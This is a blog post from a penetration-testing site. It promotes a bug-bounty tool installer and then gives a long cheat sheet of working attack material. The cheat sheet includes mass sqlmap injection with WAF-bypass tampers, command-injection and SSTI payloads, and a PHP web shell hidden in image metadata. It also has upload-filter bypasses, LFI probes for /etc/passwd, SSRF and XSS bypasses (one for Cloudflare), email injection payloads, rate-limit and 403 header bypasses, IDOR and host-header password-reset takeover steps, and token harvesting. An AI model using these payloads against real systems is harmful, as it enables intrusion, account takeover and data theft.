Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
  • SQL
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
  • Small Business
  • Resources
  • White Papers
  • Crypto News
  • Programming
    • Python
    • NodeJS
    • Java
    • Javascript
    • PHP
    • Agile
    • TypeScript
  • Android
  • SEO
  • Microsoft
    • Azure
    • Dot Net
    • Powershell
  • Networking
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Foundations of Linux Debugging eBook
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Foundations of Linux Debugging eBook
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Bug Bounty

Bug bounty builder Project

Stella Sebastian
Posted by Stella Sebastian January 4, 2022

superior_hosting_service

Awesome Bug bounty builder Project – ALL common Tools for find your Vulnerabilities.


Installation:

$ git clone https://github.com/0xJin/awesome-bugbounty-builder.git
$ cd awesome-bugbounty-builder/
$ chmod +x awesome-bugbounty-builder.sh
$ ./awesome-bugbounty-builder.sh

Tools You will find here

  • Amass
  • Sublister
  • Gauplus
  • HTTPX
  • Gf + patterns
  • Kxss
  • Sqlmap
  • Commix
  • Tplmap
  • HYDRA
  • John the ripper
  • Evilwinrm
  • Arjun
  • Paramspider
  • NoSQLmap
  • NMAP
  • Nikto
  • FFUF
  • 403-Bypass
  • Gobuster
  • Seclists
  • Hash-identifier
  • XSSMAP
  • Smuggler
  • SSRFmap
  • Gmapsapiscanner
  • Qsreplace
  • exiftool
  • XSRFProbe
  • XXE Exploiter
  • Rush
  • Rustscan
  • LFISuite
  • Wapiti

Bug Bounty TIPS and Usage of tools + One Liner TIPS :


ONE-LINER RECON for FUZZ XSS :

$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt

FUZZ all SUBDOMAINS with FUFF ONE-LINER :

$ amass enum -brute -passive -d http://example.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200'

COMMAND Injection with FUFF ONE-LINER :

$ cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
$ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
// search for ”uid” in burp proxy intercept 
// You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49'

SQL Injection Tips :

// **MASS SQL injection**
$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt
$ sqlmap -m domain2.txt -dbs --batch --random-agent
// **SQL Injection headers**
$ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
// **SQL Injection bypass 401**
$ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401

// PRO TIPS FOR BYPASSING WAF, add to SQLmap this tamper
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase

XSS + SQLi + CSTI/SSTI

Payload: '"><svg/onload=prompt(5);>{{7*7}}

EXIFTOOL + file UPLOAD Tips :

$ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
// File Upload bypass
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Open Redirect Tips ONE-LINER :

$ export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

LFI ONE-LINER :

$ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Best SSRF Bypass :

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

Email Attacks :

// **Header Injection**
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
// **XSS Injection**
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
// **SST Injection**
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
// **SQL Injection**
"' OR 1=1 -- '"@example.com
"mail'); SLEEP(5);--"@example.com
// **SSRF Attack**
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

XSS Payload for Image

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

My XSS for bypass CLOUDFLARE with default rules

"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>

Find hidden params in javascript files:

$ amass enum -passive -brute -d redacted.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

IDOR to Account TakeOver quickly :

~Create an account 
~In the reset field set a password and intercept with burp
~GET /user/2099/reset (change to 2098) send the request
~Take the token 
~Cookie editor and use this token
~Reload page

For API-KEYS :

$ use gauplus and paramspider , after you can grep words like "api" or "key" and use gmapsapiscanner for see if is vulnerable.

Find sensitive information with GF tool :

$ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee domains.txt
sort -u domains.txt | fff -s 200 -o out/
$ for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done

Bypass RATE-LIMIT by adding :

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP

Find Access Token with FFUF and GAUPLUS :

$ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt
$ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt
$ ffuf -mc 200 w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
// Use Scan Check Builder Burp extension, add passive profile to extract “accessToken” or “access_token”
// Extract found tokens and validate with https://github.com/streaak/keyhacks

Find CORS vulnerabilities :

$ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null

Bypass 403 and 401 :

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

Password poisoning bypass to account takeover :

// Request
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com

// If you receive a link this works!

Best Wordlists :

https://github.com/six2dez/OneListForAll/releases
https://github.com/Karanxa/Bug-Bounty-Wordlists

Github Link
Active Directory Exploitation Cheat Sheet

Tags: Account Takeover Bug Bounty bug hunter SQL injection SQLMap vulnerabilities XXE
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian January 4, 2022
Previous Article Internet Computer Price Prediction
Next Article Tezos Coin Price Prediction

Leave a Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Posts

Foundations of Linux Debugging eBook

February 24, 2023

Tools and Techniques for Red Team

December 26, 2022

Process Injection Enumeration Tool

December 20, 2022

SSH based reverse shell

December 18, 2022
HostnExtra Ads
Neevahost ad post

You Might Also Enjoy

Tools

Process Injection Enumeration Tool

December 20, 2022
Resources

Cloud Security Attacks

November 4, 2022
Exploits

Microsoft Edge Privilege Vulnerability

October 23, 2022
Resources

Wireless Penetration Testing

October 22, 2022
Load More
  • ABOUT
  • ADVERTISEMENT
  • TEAM
  • JOBS
  • CONTACT
  • PRIVACY POLICY
  • DISCLOSURE

© 2021 Reconshell All Rights Reserved.